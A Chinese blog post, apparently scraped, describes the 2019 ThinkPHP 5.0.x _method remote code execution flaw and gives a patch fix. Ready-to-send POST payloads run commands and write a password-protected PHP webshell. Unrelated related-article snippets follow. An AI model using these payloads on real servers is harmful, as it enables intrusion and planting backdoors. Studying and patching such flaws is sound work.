网站有漏洞被***该怎么解决和修复

2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站***到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。

***者可以伪造远程恶意代码,对服务器进行post提交数据来利用漏洞,该漏洞产生的原因是继上次2019元旦前后爆出的网站漏洞后,又一次的致命漏洞。在thinkphp目录下的library文件夹下的think\request.php代码。如下图所示:

从上述代码中可以看出整个代码写的流程,首先打开网站会从app.php代码里将请求的网站地址使用check来进行解析,然后再经过patch类型对其进行深度的赋值.然后可以使用post方式提交数据到_method函数当中去,框架会对进行判断,然后对其调用传入的参数值,经过整个代码的循坏以及传入,就可以导致request的值给覆盖掉,从而产生远程代码执行,我们来构造恶意的代码,看看漏洞是如何使用的。

post地址:anquan/public/index.php?s=captcha

POST内容:c=system&f=whoami&_method=filter

直接远程提交过去就会执行我们的命令 whoami。查看返回的post数据就可以看到我们要看的

信息。

在整体的所有版本中测试,thinkphp必须开启debug模式才可以写入webshell,写入的执行代码是:_method=construct&filter[]=assert&filter[]=file_put_contents(‘0.php‘,_decode

(‘JTNDJTI1ZXZhbCUyMHJlcXVlc3QlMjAlMjglMjJwYXNzJTIyJTI5JTI1JTNF‘))&server=-1 写入的是一句话***,连接密码是pass.

有些低版本的网站,可以不使用captcha参数也可是执行远程代码,代码如下:_method=__construct&filter[]=system&method=GET&get[]=whoami

_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo

_method=__construct&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo

以上三个都是可以执行远程代码的。

关于thinkphp漏洞的修复建议:

尽快升级thinkphp到最新版本,有一些网站可能不方便升级,也可以对代码的文件进行修复,漏洞代码是library/think/Request.php对该代码的526行,527行进行添加设置白名单机制,对请求过来的数据,以及接收的数据进行安全限制。if (in_array($method, [‘GET‘, ‘POST‘, ‘DELETE‘, ‘PUT‘, ‘PATCH‘])) {$this->method = $method,网站程序代码的安全很重要,如果网站使用了开源的CMS系统代码,不懂程序技术的话,网站会经常被******,如果自己懂程序,那就可以自己针对代码的漏洞进行漏洞修复,不懂的话,就请专业的网站安全公司来完善一下程序上的某些代码漏洞,国内像SINE安全、绿盟安全、启明星辰都是比较专业的安全公司,很多***之所以能植入***病毒,就是抓住了这些网站代码上的漏洞。

原文地址:http://blog.51cto.com/14149641/2344007

时间: 2024-11-03 21:53:56

网站有漏洞被***该怎么解决和修复的相关文章

网站常见漏洞的危害与解决方案

一.SQL注入漏洞 SQL注入漏洞的危害不仅体现在数据库层面,还有可能危及承载数据库的操作系统:如果SQL注入被用来挂马,还可能用来传播恶意软件等,这些危害包括但不限于: 1.数据库信息泄漏:数据库中存储的用户隐私信息泄露. 2.网页篡改:通过操作数据库对特定网页进行篡改. 3.网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击. 4.数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改. 5.服务器被远程控制,被安装后门:经由数据库服务器提供的操作系统支

ecshop网站漏洞如何修复针对于外贸网站的漏洞修复

由于8月份的ECSHOP通杀漏洞被国内安全厂商爆出后,众多使用ecshop程序源码的用户大面积的受到了网站被篡改,最明显的就是外贸站点被跳转到一些仿冒的网站上去,导致在谷歌的用户订单量迅速下降,从百度,谷歌,360,以及搜狗等等进入到网站的用户直接被跳转到了一些赌bo网站上去,而且网站在各大引擎的收录的快照中的标题被篡改城一些与网站不相关的内容,如图:而且网站直接被百度网址安全中心给拦截了,还有一些客户用ecshop做的购物平台是一些产品上的交易,***通过最新的网站通杀漏洞提权拿到了网站所有权

IIS上部署MVC网站,打开后ExtensionlessUrlHandler-Integrated-4.0解决办法

IIS上部署MVC网站,打开后ExtensionlessUrlHandler-Integrated-4.0解决方法 IIS上部署MVC网站,打开后500错误:处理程序“ExtensionlessUrlHandler-Integrated-4.0”在其模块列表中有一个错误模块“ManagedPipelineHandler” 解决方法如下: 以管理员运行下面的命令注册: 32位机器: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regii

怎么用啊D注入工具检测asp网站注入漏洞

1. http://jingyan.baidu.com/article/4d58d541ce04ae9dd4e9c0f9.html 2. asp网页很怕注入漏洞,特别是比较老的企业网站,很多都有注入漏洞,怎么用啊D注入工具检测asp网站注入漏洞? 啊D注入工具是一种主要用于SQL的注入工具,由彭岸峰开发,使用了多线程技术,能在极短的时间内扫描注入点.使用者不需要经过太多的学习就可以很熟练的操作.并且该软件附带了一些其它的工具,可以为使用者提供极大的方便. 工具/原料 啊D注入工具 DSQLToo

为什么仍有这么多的网站存在漏洞

为什么仍然有很多网站漏洞?据了解,大多数企业网站的漏洞包含OpenSSL.PHP和WordPress中的漏洞,这些漏洞主要是由于这些开源软件中存在着大量自定义组合以及缺乏测试和漏洞修复. 本文中让我们看看如何从一开始以及整个开发生命周期中修复这些漏洞. 很多网站的安全漏洞 "很多网站(和Web应用程序)漏洞的主要原因是这些技术完全定制化开发的性质,"美国国家安全局前情报收集人员.现Masergy Communications公司主管David J. Venable表示,这样的结果会产生

Windows Server 2008 网站访问PHP响应慢的解决方法

公司新上了一个网站,但是在配置完PHP环境之后却发现了问题,访问HTML速度飞快,而访问PHP网页时就要卡顿1秒,响应很慢的样子,排除了带宽的因素之后,在百度上搜了一圈竟然解决了,现在将方法转载给大家,其实解决方法很简单哦. IIS7.5网站访问PHP响应慢的原因 原因是PHP5.3以上支持IPv6协议,但是大家的服务器未使用IPv6,我们配置数据库信息时都类似这样的“$dbhost=‘localhost' ”,这本身是没有问题的,只是当访问PHP的时候会连接MySQL的地址为localhost

Delphi中WebBrowser控件打开部分网站报"Invalid floating point operation”解决

Delphi中WebBrowser控件打开部分网站报"Invalid floating point operation”解决 EmbeddedWBWebBrowserDelphi 最近用EmbeddedWB控件做浏览器相关应用的时候,发现有些网页只要一打开就一定会蹦出一个“Invalid floating point operation”异常(关掉异常对话框以后,浏览器无响应),而程序仅仅是一句 WebBrowser1.Navigate(Edit1.Text);貌似很多含有Silverlight

从根本分析网站降权的原因与解决方法

网站降权了该怎么办?这个是做seo优化人员的经常面临与遇到的问题,不知道该从何分析与着手,下面小编就带着大家来分析原因并解决网站降权:        网站优化从两方面着手,站内优化与站外优化,首先我们先从站内优化开始分析: 1.锚文本过分 许多站长喜好做锚文本和全站毗邻,每更新一篇文章,见关键词就做锚文本,见主页关键词就做全站毗邻,至使蜘蛛在抓取日志的时分,有区分优化过速,刻意搜刮引擎优化的猜忌,被罚降权. 解决方法: 淘汰锚文本的数目,通常1000字的文章,放10个没关系.尚有,放关键词超毗邻

网站常见漏洞及解决方案

网站设计者在设计网站时,一般将大多数精力都花在考虑满足用户应用,如何实现业务等方面,而很少考虑网站开发过程中所存在的安全漏洞,这些漏洞在不关注网站安全的用户眼里几乎不可见,在正常的网站访问过程中,这些漏洞也不会被察觉.但对于别有用心的攻击者而言,这些漏洞很可能会对网站带来致使的伤害. 网站渗透测试,也称为网站安全检测.网站安全测试.Web安全检测.网站安全评估.网站漏洞测试等. 它是一项为了防止网站被非法入侵(如篡改网页.盗取网站数据.网站挂马),在得到用户授权后对网站进行的漏洞检测. 在网站渗